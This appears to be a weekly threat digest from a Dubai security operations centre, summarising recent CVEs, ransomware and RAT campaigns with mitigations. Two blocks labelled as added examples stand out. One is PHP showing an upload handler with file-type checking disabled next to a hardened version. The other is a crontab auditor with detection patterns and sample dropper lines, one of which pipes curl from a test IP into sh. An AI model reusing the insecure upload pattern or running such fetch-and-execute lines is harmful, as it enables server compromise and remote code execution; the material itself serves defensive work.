Weekly Threat Landscape Digest – Week 23

HawkEye CSOC Dubai

This week’s threat landscape highlights the evolving sophistication of threat actors, who are increasingly targeting newly disclosed and unpatched vulnerabilities. From zero-day attacks to advanced phishing campaigns, their techniques continue to grow in complexity. To mitigate these risks, organizations must adopt a proactive, layered security approach.

This includes timely patch management, continuous monitoring, and robust detection capabilities. Equally important is fostering a strong cybersecurity culture—one that is supported by real-time threat intelligence, ongoing awareness initiatives, and a well-defined incident response plan to minimize potential damage from emerging threats.

Mozilla Thunderbird and Firefox Updates

Mozilla has released security updates addressing multiple vulnerabilities in its Thunderbird and Firefox for iOS products. If exploited, these vulnerabilities could allow memory corruption, arbitrary code execution, or URL spoofing.

Key Details:

  • Thunderbird Vulnerabilities:
    • CVE-2025-4918 – Out-of-Bounds Access in Promise Objects
      • Severity: Critical
      • Description: Improper memory handling in JavaScript Promise objects may result in out-of-bounds read/write, leading to memory corruption, information disclosure, or potential code execution.
    • CVE-2025-4919 – Out-of-Bounds Access When Optimizing Linear Sums
      • Severity: Critical
      • Description: A flaw in array index handling can cause out-of-bounds read/write in JavaScript, which may result in memory corruption or arbitrary code execution.
  • Firefox for iOS Vulnerability:
    • CVE-2025-5020 – URL Spoofing via Non-HTTP Schemes
      • Severity: Low
      • Description: Malicious URLs using non-HTTP schemes (e.g., mailto:, ftp:) could cause URL spoofing in Firefox for iOS when opened from other applications, increasing the risk of phishing attacks.

Fixed Versions:

  • Thunderbird: 128.10.2, 138.0.2
  • Firefox for iOS: Version 139

Mitigation/Workaround:

  • Apply the security updates to Thunderbird and Firefox for iOS as soon as possible.
  • Ensure that all endpoints are running the fixed versions mentioned above.
  • Raise awareness among users regarding the risk of phishing and spoofing through malformed URLs.

References:

https://www.mozilla.org/en-US/security/advisories/mfsa2025-40/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-41/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-39/


GitLab CE and EE Vulnerability Fixes

GitLab has released critical and moderate severity security patches for both Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities. These vulnerabilities impact server resource management, authentication enforcement, and data exposure controls. Unpatched systems remain at risk of denial-of-service, authentication bypass, and potential data leaks.

Key Details:

  • CVE-2025-0993 – Unprotected large blob endpoint allows Denial of Service
    • Severity: High (CVSS 7.5)
    • Impact: Authenticated attackers may exhaust server resources.
  • CVE-2024-12093 – Improper XPath validation allows SAML 2FA bypass
    • Severity: Medium (CVSS 6.8)
    • Impact: Modified SAML responses can bypass 2FA.
  • CVE-2024-7803 – Discord webhook integration may cause DoS
    • Severity: Medium (CVSS 6.5)
    • Impact: Webhook misuse can overload the system.
  • CVE-2025-3111 – Unbounded Kubernetes cluster tokens
    • Severity: Medium (CVSS 6.5)
    • Impact: Authenticated users may trigger denial-of-service.
  • CVE-2025-2853 – Unvalidated notes position can lead to DoS
    • Severity: Medium (CVSS 6.5)
    • Impact: Malformed input can be abused to crash the note display.
  • CVE-2025-4979 – Masked CI variables may be exposed
    • Severity: Medium (CVSS 4.9)
    • Impact: The web UI may display hidden variables.
  • CVE-2025-0605 – Two-factor authentication bypass via group access
    • Severity: Medium (CVSS 4.6)
    • Impact: Certain users may circumvent 2FA enforcement.
  • CVE-2025-0679 – Full email addresses exposed
    • Severity: Medium (CVSS 4.3)
    • Impact: Unauthorized users may access complete email addresses.
  • CVE-2024-9163 – Branch name confusion in confidential MRs
    • Severity: Low (CVSS 3.5)
    • Impact: Merge request misdirection via logic flaw.
  • CVE-2025-1110 – Unauthorized access to job data via GraphQL
    • Severity: Low (CVSS 2.7)
    • Impact: Privilege escalation via crafted GraphQL queries.

 

Impacted Versions and Fix Timeline:

  • Affected Versions: GitLab CE/EE versions prior to 18.0.1, 17.11.3, 17.10.7
  • Fixed Versions: 18.0.1, 17.11.3, 17.10.7

Mitigation/Workaround:

  • Apply the security patches to all GitLab CE and EE instances.
  • Monitor for any abnormal behavior or unauthorized access attempts.
  • Review webhook configurations and access policies to minimize exposure.
  • Validate Kubernetes cluster integrations and CI variable masking practices.

Reference:

https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/


Google Chrome Security Update

Google has released a security update for Chrome addressing eight vulnerabilities, including one high-severity issue. If exploited, these vulnerabilities could allow remote code execution, unauthorized access, and privilege escalation. Affected platforms include Windows, macOS, Android, and iOS.

Key Details:

  • CVE-2025-5063 – Use-After-Free in Compositing
    • Severity: High
    • Impact: May allow attackers to execute arbitrary code remotely by exploiting memory management flaws.
  • CVE-2025-5064 – Inappropriate Implementation in Background Fetch
    • Severity: Medium
    • Impact: Could lead to data leaks or unexpected behavior.
  • CVE-2025-5065 – Inappropriate Implementation in FileSystemAccess API
    • Severity: Medium
    • Impact: May result in unauthorized file access or manipulation.
  • CVE-2025-5066 – Inappropriate Implementation in Messages
    • Severity: Medium
    • Impact: May allow privilege escalation due to improper handling of browser messaging components.
  • CVE-2025-5067 – Inappropriate Implementation in Tab Strip
    • Severity: Low
    • Impact: Minor functional issues within the browser’s UI components.

Fixed Versions:

  • Desktop (Windows & macOS): Chrome 137.0.7151.40/.41
  • Android: Chrome 135 (137.0.7151.44)
  • iOS: Chrome Stable 137 (137.0.7151.34)

Mitigation/Workaround:

  • Promptly update all Chrome browsers across Windows, macOS, Android, and iOS platforms to the fixed versions listed above.
  • Encourage users to restart their browsers after updating to ensure patches are applied.
  • Monitor endpoint browsers for compliance and unexpected behaviors.
  • Raise awareness among employees about phishing or exploit campaigns targeting browser vulnerabilities.

References:

https://chromereleases.googleblog.com/2025/05/early-stable-update-for-desktop.html https://chromereleases.googleblog.com/


Critical Vulnerability in NETGEAR Routers

A critical authentication bypass vulnerability has been identified in NETGEAR DGND3700v2 wireless routers. Exploitation of this flaw can lead to full administrative access, resulting in total network compromise, including risks such as credential theft, DNS hijacking, and persistent malware deployment.

Key Details:

  • CVE ID: CVE-2025-4978
  • Severity: Critical (CVSS v4 Score: 9.3)
  • Description: A hidden backdoor in the embedded HTTP server of the NETGEAR DGND3700v2 router allows unauthenticated remote attackers to gain full administrative access without credentials. This may enable attackers to manipulate network settings, intercept communications, and deploy malware for persistent access.

Affected Product and Version:

  • Product: NETGEAR DGND3700v2 Wireless Router
  • Firmware Version Affected: V1.1.00.15_1.00.15NA

Fixed Version:

  • Remediated in Firmware: V1.1.00.26 or later

Mitigation/Workaround:

  • Immediately upgrade NETGEAR DGND3700v2 routers to firmware version V1.1.00.26 or newer.
  • If upgrading is not feasible, consider isolating the router from internet access and replacing it with a more secure model.
  • Monitor network traffic for suspicious activity, including unauthorized administrative access and DNS manipulation.
  • Inform users of the risks associated with this vulnerability and the importance of firmware updates.

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2025-4978


High-Severity Privilege Escalation Vulnerability in Apple Products

Apple has released critical security patches to address a high-severity vulnerability (CVE-2025-31219) in the XNU kernel, which underpins macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. This flaw could allow local attackers with limited privileges to escalate access and execute arbitrary code with kernel-level control, posing serious risks of system compromise.

Key Details:

  • CVE ID: CVE-2025-31219
  • CVSS Score: 8.8 (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
  • Severity: High
  • Root Cause: Race condition due to improper locking in the kernel’s virtual memory subsystem
  • Impact:

    • Privilege escalation from low-privileged user to root/system level
    • Arbitrary code execution with full system control
    • Potential system compromise and denial-of-service via memory corruption
  • Exploit Status: No known public exploitation as of publication
  • Disclosure: Responsibly disclosed via Trend Micro’s Zero Day Initiative

Affected Platforms and Versions:

  • macOS Sequoia: Versions prior to 15.5
  • macOS Sonoma: Versions prior to 14.7.6
  • macOS Ventura: Versions prior to 13.7.6
  • iOS/iPadOS: Versions prior to 18.5
  • tvOS: Versions prior to 18.5
  • watchOS: Versions prior to 11.5
  • visionOS: Versions prior to 2.5

Fixed Versions:

  • macOS Sequoia: 15.5
  • macOS Sonoma: 14.7.6
  • macOS Ventura: 13.7.6
  • iOS/iPadOS: 18.5
  • tvOS: 18.5
  • watchOS: 11.5
  • visionOS: 2.5

Mitigation/Workaround:

  • Apply the latest security updates for all listed Apple platforms immediately.
  • Ensure all managed Apple devices are updated via MDM or centralized patch management tools.
  • Monitor devices for signs of unusual privilege elevation or system instability.

Reference:

https://www.zerodayinitiative.com/advisories/ZDI-25-305/


Cross-Site Scripting (XSS) Vulnerability in Bitwarden

A medium-severity DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been identified in Bitwarden, a widely used password management solution. The flaw could allow attackers to inject and execute malicious JavaScript within the Bitwarden web application, potentially leading to account compromise, credential theft, and unauthorized actions.

Key Details:

  • CVE ID: CVE-2025-5138
  • Severity: Medium
  • Vulnerability Type: DOM-based Cross-Site Scripting (XSS)
  • Affected Component: PDF File Handler within the Resources upload feature
  • Root Cause: Insufficient file type validation and inadequate input neutralization
  • Attack Vector: Malicious PDF upload containing JavaScript payload
  • Impact:

    • JavaScript execution in the context of authenticated user sessions
    • Account hijacking through stolen session tokens or credentials
    • Credential theft via browser-based exploitation
  • Proof-of-Concept Exploit: Publicly available, increasing exploitation risk

Impacted Versions and Fix Timeline:

  • Affected Versions: Bitwarden versions 2.25.1 and earlier
  • Fixed Version: Security update pending; users should upgrade to a version newer than 2.25.1 once released

Mitigation/Workaround:

  • Do not upload untrusted PDFs within Bitwarden until patched
  • Update immediately once the fixed version is available
  • Enable Web Application Firewalls (WAFs) to block malicious upload attempts
  • Monitor for suspicious activity, such as unauthorized logins or session anomalies

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2025-5138


Security Updates – Tenable Network Monitor

Tenable has released version 6.5.1 of Tenable Network Monitor, addressing multiple high-severity vulnerabilities, including local privilege escalation flaws and weaknesses in bundled third-party libraries. These vulnerabilities could allow attackers to escalate privileges or compromise system integrity.

Key Details:

  • CVE-2025-24916
    • CVSS Score: 7.0 (High)
    • Description: Insecure permissions on sub-directories created during non-default installations on Windows systems
    • Impact: May allow unauthorized users to escalate privileges locally and compromise system integrity
  • CVE-2025-24917
    • CVSS Score: 7.8 (High)
    • Description: Vulnerability allows non-administrative users to stage malicious files which can be executed with SYSTEM-level privileges
    • Impact: Potential full system compromise through local privilege escalation

Third-Party Libraries Updated in Version 6.5.1:

  • OpenSSL upgraded to version 3.0.16
  • expat upgraded to version 2.7.0
  • curl upgraded to version 8.12.0
  • libpcap upgraded to version 1.10.5
  • libxml2 upgraded to version 2.13.8

Affected Products:

  • All versions of Tenable Network Monitor released prior to version 6.5.1 are vulnerable

Mitigation/Workaround:

  • Update all Tenable Network Monitor deployments to version 6.5.1 or later without delay
  • Review local installation paths, especially for Windows deployments, to ensure permissions are secured
  • Monitor systems for signs of unauthorized privilege escalation
  • Validate that all bundled libraries are up to date

Reference:

https://www.tenable.com/security/tns-2025-10


Critical Vulnerability in TI WooCommerce Wishlist Plugin

A critical security vulnerability in the TI WooCommerce Wishlist plugin for WordPress (CVE-2025-47577) allows unauthenticated remote attackers to upload arbitrary files—such as executable PHP scripts—potentially leading to full remote code execution (RCE) on affected servers. This issue remains unpatched at the time of this advisory.

Key Details:

  • CVE ID: CVE-2025-47577
  • CVSS Base Score: 10.0 (Critical)
  • Affected Component: tinvwl_upload_file_wc_fields_factory function in integrations/wc-fieldsfactory.php
  • Root Cause: Security checks in the file upload mechanism are disabled via ‘test_type’ => false, allowing arbitrary files to be uploaded
  • Exploit Conditions: Requires the WC Fields Factory plugin to be active alongside the wishlist plugin
  • Impact:

    • Full remote code execution (RCE)
    • Website defacement
    • Data exfiltration
    • Malware deployment
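The root cause above is a WordPress upload handler that switches off the core file-type check. The following is an added illustration, not the plugin's own code: it contrasts that pattern with a hardened handler. The function names, the nonce action and the allow-list are assumptions; wp_handle_upload(), wp_check_filetype_and_ext(), wp_verify_nonce() and current_user_can() are WordPress core functions.

```php
<?php
// Added example (not the plugin's code). Runs inside WordPress; the handler
// names, the nonce action and the $allowed list are assumptions.

// Vulnerable pattern: 'test_type' => false turns off WordPress's extension/MIME
// check, so whatever the client uploads (a .php file included) is written to the
// uploads directory unchanged. This is the root cause described in the advisory.
function example_vulnerable_upload( array $file ) {
    return wp_handle_upload( $file, array(
        'test_form' => false,
        'test_type' => false,   // disables the file-type check
    ) );
}

// Hardened pattern: keep the type check on, pin an explicit allow-list of
// extension => MIME pairs, verify the real content against the declared name,
// and require a capability plus a nonce so only intended, authenticated
// requests reach the handler.
function example_hardened_upload( array $file, string $nonce ) {
    if ( ! current_user_can( 'upload_files' ) ) {
        return new WP_Error( 'forbidden', 'Insufficient privileges.' );
    }
    if ( ! wp_verify_nonce( $nonce, 'example_wishlist_upload' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid request token.' );
    }

    // Assumed allow-list for a wishlist form field: no executable types.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'pdf'      => 'application/pdf',
    );

    // Cross-check the declared filename against the actual bytes before
    // handing the file to core; a mismatch or unknown type is rejected.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'bad_type', 'File type not permitted.' );
    }

    return wp_handle_upload( $file, array(
        'test_form' => false,
        'test_type' => true,    // core re-validates against $allowed
        'mimes'     => $allowed,
    ) );
}
```

Pair the hardened handler with the advisory's mitigation of denying script execution in the uploads directory, so a type-check regression does not become code execution.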

Affected Versions:

  • All versions up to and including 2.9.2

Mitigation/Workaround:

  • Immediately deactivate and remove the TI WooCommerce Wishlist plugin from all websites
  • Conduct a full server file audit to identify unauthorized uploads or malicious scripts
  • Implement the following mitigations:
    • Web Application Firewall (WAF) to block suspicious uploads
    • File Integrity Monitoring to detect unauthorized file changes
    • Restrict execution permissions on uploaded files and directories
  • Monitor the official plugin page and trusted advisories for updates regarding a patched version
  • If continued wishlist functionality is necessary, consider alternative plugins with active development and security reviews

References:

https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommerce-wishlist-plugin/

https://nvd.nist.gov/vuln/detail/CVE-2025-47577



Mozilla Products: Multiple Vulnerabilities and Critical Double-Free in libvpx

Mozilla has issued several security advisories addressing multiple vulnerabilities across its Firefox and Thunderbird product lines, including Extended Support Releases (ESR). These vulnerabilities pose significant risks such as memory corruption, cross-origin data leakage, code execution, and clickjacking. A critical double-free vulnerability in the libvpx encoder used for WebRTC (CVE-2025-5262) stands out for its potential to cause exploitable crashes.

Key Details:

  • CVE-2025-5262 – Double-Free in libvpx Encoder
    • Severity: Critical
    • Description: A double-free may occur in vpx_codec_enc_init_multi if a memory allocation fails during initialization of the encoder used in WebRTC. This can result in memory corruption and lead to application crashes that are potentially exploitable by attackers.
  • Other vulnerabilities addressed:

    • Cross-origin data leak vectors
    • Local code execution weaknesses
    • Clickjacking and spoofing flaws in user interface elements

Affected Products:

  • Firefox: Versions prior to 139
  • Firefox ESR: Versions prior to 115.24 and 128.11
  • Thunderbird: Versions prior to 139 and 128.11

Mitigation/Workaround:

  • Apply the latest security patches for Firefox, Firefox ESR, and Thunderbird immediately
  • Monitor systems for abnormal browser behavior or crash events
  • Educate users on risks such as clickjacking and cross-origin spoofing to reduce user-targeted threats

 

References:

https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/

https://www.mozilla.org/en-US/security/advisories/mfsa2025-46


Google Patches Actively Exploited Chrome Zero-Day (CVE-2025-5419)

A high-severity vulnerability in the V8 JavaScript and WebAssembly engine used by Google Chrome (CVE-2025-5419) has been actively exploited in the wild. This flaw allows remote attackers to trigger heap corruption through a specially crafted HTML page, potentially leading to arbitrary code execution in the context of the browser.

Key Details:

  • CVE: CVE-2025-5419
  • Severity: High
  • CVSS Score: 8.3
  • Impact: Arbitrary code execution, system compromise
  • Affected Products:

    • Google Chrome versions prior to 137.0.7151.68 on Windows, macOS, and Linux
    • Other Chromium-based browsers (e.g., Microsoft Edge, Brave, Opera, Vivaldi) may also be impacted
  • Fixed Version:

    • Chrome 137.0.7151.68 for Linux
    • Chrome 137.0.7151.68/.69 for Windows and macOS

Mitigation/Workaround:

  • Update Google Chrome to version 137.0.7151.68/.69 as soon as possible
  • Watch for updates and patch Chromium-based browsers promptly
  • Avoid opening untrusted links or websites until updated

 

References:

https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

https://chromereleases.googleblog.com/


Everest Ransomware Targets Department of Culture and Tourism Abu Dhabi

On May 26, 2025, the Everest ransomware group claimed responsibility for a cyberattack on the Department of Culture and Tourism Abu Dhabi (DCT Abu Dhabi), exfiltrating 12GB of sensitive data, including employee records, passport copies, and internal documents. The group has threatened to leak the data unless a ransom is paid by June 1, underscoring their focus on high-profile targets in the Middle East.

Key Details:

  • Impact:
    • Theft and public leakage of sensitive corporate and personal data
    • Operational disruptions
    • Reputational and legal damage
    • Increased likelihood of ransom payment due to high-stakes pressure tactics
  • Recent Activity:

    • Everest has also targeted Coca-Cola’s Middle East operations, Mediclinic, and Jordan Kuwait Bank in recent weeks
    • Tactics center on data theft and public exposure rather than encryption, using a dark web leak site to pressure victims

Affected Product:

  • No specific software product implicated; organizations with exposed remote services, unpatched systems, or weak identity controls are at risk

Mitigation/Workaround:

  • Conduct regular audits for exposed services (e.g., RDP, VPN, cloud management ports)
  • Enforce multi-factor authentication and credential hygiene
  • Monitor for signs of compromise, including data exfiltration or access anomalies
  • Prepare and test incident response plans
  • Regularly back up critical data and store it offline
  • Monitor leak sites for mentions of your organization


Earth Kurma APT Campaign

The Earth Kurma group is actively targeting government and telecommunications sectors in Southeast Asia, including the Philippines, Vietnam, Thailand, and Malaysia. Using rootkits and cloud-based tools, they focus on data exfiltration and maintaining persistent access through spear-phishing and exploitation of public-facing applications.

Key Details:

  • Tactics:
    • Spear-phishing emails with malicious attachments
    • Exploiting known vulnerabilities in public-facing applications
    • Deployment of custom malware, rootkits, and cloud-based services for long-term espionage
  • Impact:

    • Credential theft via keylogging tools
    • Exfiltration of sensitive files using public cloud services (Dropbox, OneDrive)
    • Deployment of advanced malware loaders and rootkits
    • Prolonged undetected access with stealth techniques
    • Full-featured remote access capabilities (process hiding, shellcode injection, network concealment)

Indicators of Compromise (IOCs): SHA-256 hashes of samples attributed to the TESDAT, KRNRAT, DUNLOADER, DMLOADER, MORIYA, KMLOG, SIMPOBOXSPY, ODRIZ, LADON, FRPC, NBTSCAN, ICMPINGER and WMIHACKER tooling, together with C&C domains and IPv4 addresses.

 


 

Mitigation/Workaround:

  • Patch all systems and public-facing applications promptly
  • Restrict and monitor admin privileges; use separate accounts for sensitive operations
  • Audit and log cloud storage usage (Dropbox, OneDrive) for unusual activity
  • Limit and monitor PowerShell and WMI usage
  • Watch for new or suspicious services, DLLs, and hidden files
  • Deploy EDR/XDR solutions for advanced threat detection
  • Segment networks to contain lateral movement
  • Regularly audit scheduled tasks and startup items for persistence
  • Enable comprehensive logging and set alerts for suspicious or anomalous activity


Cisco Enterprise Platform Vulnerabilities

Cisco has disclosed several high-impact vulnerabilities affecting its Identity Services Engine (ISE), Contact Center Intelligence Center (CUIC), and Unified Contact Center Express (CCX) products. These flaws could allow attackers to disrupt network access control, escalate privileges, or access unauthorized data.

Key Details:

  • CVE-2025-20152 (ISE RADIUS DoS):
    • Severity: High (CVSS 8.6)
    • Impact: Unauthenticated remote attackers can crash the RADIUS service in Cisco ISE 3.4 by sending specially crafted authentication requests, causing service restarts or outages.
    • Affected: Cisco ISE 3.4 (fixed in 3.4 Patch 1). Earlier versions are not affected.
  • CVE-2025-20113 (CUIC Admin Privilege Escalation):
    • Severity: High (CVSS 7.1)
    • Impact: Authenticated users can escalate privileges to admin via the CUIC web interface.
    • Affected: CUIC 12.5 (fixed in 12.5(1)SU ES04), CUIC 12.6 (fixed in 12.6(2)ES04).
  • CVE-2025-20114 (CUIC Horizontal Privilege Escalation):
    • Severity: Medium (CVSS 4.3)
    • Impact: Authenticated users may access or modify other users’ dashboards.
    • Affected: CUIC 12.5 and 12.6 (fixed in the ES04 releases listed above).
    • Unified CCX: Versions 12.5(1)SU3 and earlier are impacted via CUIC integration; migration to a fixed CUIC version is required.

Mitigation/Workaround:

  • Upgrade Cisco ISE to 3.4 Patch 1 or later.
  • Apply the latest ES04 updates to CUIC 12.5 and 12.6.
  • Migrate Unified CCX instances to use updated CUIC versions.
  • Monitor ISE RADIUS logs for abnormal authentication activity and set alerts for service disruptions.
  • Audit CUIC access logs and privilege assignments; enforce least privilege.
  • Restrict administrative web interfaces to internal networks or secure VPNs.

References:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-restart-ss-uf98692Q

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4


Reflected XSS in PAN-OS GlobalProtect (CVE-2025-0133)

A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks’ PAN-OS GlobalProtect portal and gateway (CVE-2025-0133) allows attackers to inject JavaScript into authenticated user sessions. The risk is heightened when the Clientless VPN feature is enabled, and a public proof-of-concept is available.

Key Details:

  • CVE: CVE-2025-0133
  • Type: Reflected XSS
  • Severity: CVSS 5.1 (Low) without Clientless VPN, 6.9 (Medium) with Clientless VPN
  • Attack Vector: Remote, via crafted URLs
  • Impacted: PAN-OS 11.2.0–11.2.6 (fix in 11.2.7, ETA June 2025), 11.1.0–11.1.10 (fix in 11.1.11, ETA July 2025), 10.2.0–10.2.16 and 10.1.0–10.1.14 (fix in 10.2.17, ETA August 2025). Older versions require upgrade to a supported release.

Mitigation/Workaround:

  • Schedule and apply the latest PAN-OS updates as soon as they are available.
  • Disable Clientless VPN if not essential, especially on externally accessible portals.
  • Train users to avoid clicking on suspicious or untrusted links, particularly those received via email or chat.

Reference:

https://security.paloaltonetworks.com/CVE-2025-0133


LummaC2 Infostealer Campaign

LummaC2, a modular infostealer, is being used in a global campaign targeting organizations through phishing and fake software downloads. The malware is capable of stealing credentials, session tokens, browser data, cryptocurrency wallets, and multi-factor authentication information. It employs in-memory execution, encrypted C2 communications, and self-deletion to evade detection.

Key Details:

  • Delivery: Phishing emails, malicious attachments, fake installers, and bundled software.
  • Execution: Uses fake CAPTCHA popups, clipboard scripts, and Windows Run commands to trigger infection.
  • Capabilities:

    • In-memory operation to avoid detection
    • Exfiltration of browser credentials, cookies, crypto wallets, and MFA data
    • Clipboard abuse and Windows Run execution
    • Beaconing to encrypted C2 servers
    • Self-deletion and payload loading for persistence

 

Mitigation/Workaround:

  • Deploy advanced email and endpoint security with behavioral analysis and memory scanning.
  • Train users to recognize phishing, suspicious downloads, and social engineering tactics like fake CAPTCHAs.
  • Monitor outbound network traffic for unusual domains and restrict script execution.
  • Enforce least privilege and keep all systems and applications fully patched.

Reference:

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b


Critical Authentication Bypass in Cisco ISE Cloud Deployments (CVE-2025-20286)

Cisco has patched a critical static credential vulnerability in its Identity Services Engine (ISE) affecting cloud deployments on AWS, Azure, and Oracle Cloud Infrastructure (OCI). This flaw (CVE-2025-20286, CVSS 9.9) could allow unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify configurations, or disrupt services.

Key Details:

  • CVE: CVE-2025-20286
  • Severity: Critical (CVSS 9.9)
  • Vulnerability Type: Static credential flaw in cloud deployments
  • Impacted Platforms:
    • AWS: Cisco ISE 3.1, 3.2, 3.3, 3.4
    • Azure: Cisco ISE 3.2, 3.3, 3.4
    • OCI: Cisco ISE 3.2, 3.3, 3.4
  • Root Cause: Improper credential generation leads to shared static credentials for each release/platform combination, making it possible for attackers to use credentials from one deployment to access others on the same platform and release.

 

Attack Scenario:

  • An attacker with knowledge of the static credentials for a specific ISE release and cloud platform can access any deployment with matching parameters, potentially extracting credentials, accessing sensitive data, or disrupting services.
  • Only cloud-based Primary Administration nodes are affected; on-premises deployments are not impacted.

Mitigation/Workaround:

  • Apply Cisco’s security patches for all affected cloud deployments immediately.
  • Restrict network access to Cisco ISE administration interfaces to authorized administrators only.
  • If immediate patching is not possible, use the “application reset-config ise” command to reset user passwords (note: this will reset the system to factory defaults).
  • Monitor for unauthorized access attempts and review cloud firewall rules to limit exposure.

References:

https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html


  • Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

A new variant of the open-source Chaos RAT is being actively deployed in attacks against both Windows and Linux systems. Threat actors are distributing the malware by disguising it as legitimate network troubleshooting utilities, particularly targeting Linux environments.

Key Details:

  • Malware: Chaos RAT (Remote Access Trojan), written in Golang for cross-platform support
  • Distribution: Delivered via phishing emails with malicious links or attachments, often masquerading as network tools (e.g., “NetworkAnalyzer.tar.gz”)
  • Capabilities:

    • Establishes remote control sessions
    • Launches reverse shells
    • Uploads, downloads, and deletes files
    • Takes screenshots and gathers system information
    • Locks, restarts, or shuts down infected machines
    • Opens arbitrary URLs
    • Modifies Linux crontab for persistence
  • Observed Use:

    • Frequently paired with cryptocurrency mining campaigns (e.g., XMRig miner)
    • Used for reconnaissance and information gathering on compromised devices
  • Latest Version: 5.0.3 (released May 31, 2024)

Vulnerabilities in Chaos RAT Admin Panel:

  • CVE-2024-30850: Command injection vulnerability (CVSS 8.8)
  • CVE-2024-31839: Cross-site scripting (XSS) flaw (CVSS 4.8)
  • Both issues have been patched as of May 2024.

Additional Threats:

  • Recent campaigns also target Trust Wallet users on desktop, distributing counterfeit wallet apps via phishing and deceptive downloads to steal credentials, seed phrases, and private keys.

Mitigation/Workaround:

  • Educate users to avoid downloading network tools or wallet software from untrusted sources.
  • Monitor for suspicious cron job modifications and unexpected scheduled tasks, especially on Linux systems.
  • Deploy endpoint protection capable of detecting in-memory malware and reverse shell activity.
  • Patch Chaos RAT admin panels to the latest version to address known vulnerabilities.
  • Regularly audit systems for unauthorized software and monitor for signs of credential theft or clipboard abuse.
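
The crontab persistence noted above is something a defender can audit directly. The following Python is an added example, not code from the original report; it parses a user crontab and flags dropper-style entries, using a constructed sample crontab.

```python
"""Audit a user crontab for download-and-execute persistence entries.

Added example for the Chaos RAT entry above, not code from the original report.
It parses user-crontab lines (five schedule fields or an @reboot shortcut, no
user column) and flags dropper traces: a fetch piped into a shell, programs in
volatile or hidden paths, base64-decoded payloads. The sample is constructed.
"""
import re

SUSPICIOUS = [
    ("fetch_piped_to_shell", re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|z|da)?sh\b")),
    ("runs_from_volatile_path", re.compile(r"(?:^|[\s;|&])(?:/tmp|/dev/shm|/var/tmp)/\S+")),
    ("base64_decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("hidden_path", re.compile(r"/\.[A-Za-z0-9_-]+/")),
]

def split_cron_line(line):
    """(schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):          # @reboot, @daily, ...
        parts = line.split(None, 1)
    else:                             # minute hour dom month dow command
        parts = line.split(None, 5)
        if len(parts) == 6:
            parts = [" ".join(parts[:5]), parts[5]]
    return tuple(parts) if len(parts) == 2 else None

def audit_crontab(text):
    """List of (schedule, command, reasons) for entries that trip any rule."""
    findings = []
    for line in text.splitlines():
        entry = split_cron_line(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if reasons:
            findings.append((schedule, command, reasons))
    return findings

# Constructed sample: one legitimate job and three dropper-style entries.
SAMPLE_CRONTAB = """\
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh --quiet
*/5 * * * * curl -s http://203.0.113.10/NetworkAnalyzer | sh
@reboot /dev/shm/.x/sysupdate >/dev/null 2>&1
30 * * * * echo aGVsbG8= | base64 -d | bash
"""
```

Run it against `crontab -l` output for each account, and for /etc/cron.d files drop the user column before calling split_cron_line.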

References:

https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html


  • NetSupport RAT Delivered via Fake DocuSign and Gitcode Sites Using Multi-Stage PowerShell Attacks

A new campaign is leveraging counterfeit DocuSign and Gitcode websites to distribute NetSupport RAT through a sophisticated, multi-stage PowerShell attack chain. The operation relies on social engineering to trick users into executing malicious scripts, ultimately granting attackers remote access to compromised systems.

Key Details:

  • Malware: NetSupport RAT (legitimate remote administration tool abused for malicious purposes)
  • Delivery Method:

    • Fake DocuSign and Gitcode sites prompt users to complete a CAPTCHA or follow instructions, which covertly copies an obfuscated PowerShell command to the clipboard (clipboard poisoning).
    • Victims are instructed to paste and run the script via the Windows Run dialog, initiating the infection chain.
  • Attack Flow:

    • Initial PowerShell script downloads a secondary script from an external server (e.g., tradingviewtool[.]com).
    • Subsequent scripts fetch additional payloads, including a persistence mechanism (“wbdims.exe”) and a ZIP archive containing “jp2launcher.exe.”
    • The final stage executes NetSupport RAT, granting attackers remote control.
  • Evasion Techniques:

    • Multi-stage scripting to bypass detection and complicate analysis
    • Use of legitimate tools (NetSupport Manager) to blend in with normal administrative activity
    • ClickFix-style CAPTCHAs and social engineering to increase user compliance

Associated Infrastructure:

  • Malicious domains include:
    • tradingviewtool[.]com
    • docusign.sa[.]com

Mitigation/Workaround:

  • Educate users to avoid running scripts or commands from untrusted websites, especially those received via email or social media.
  • Monitor for clipboard manipulation and suspicious PowerShell activity on endpoints.
  • Block access to known malicious domains and monitor for connections to suspicious infrastructure.
  • Deploy endpoint protection with behavioral analysis to detect multi-stage script execution and RAT deployment.
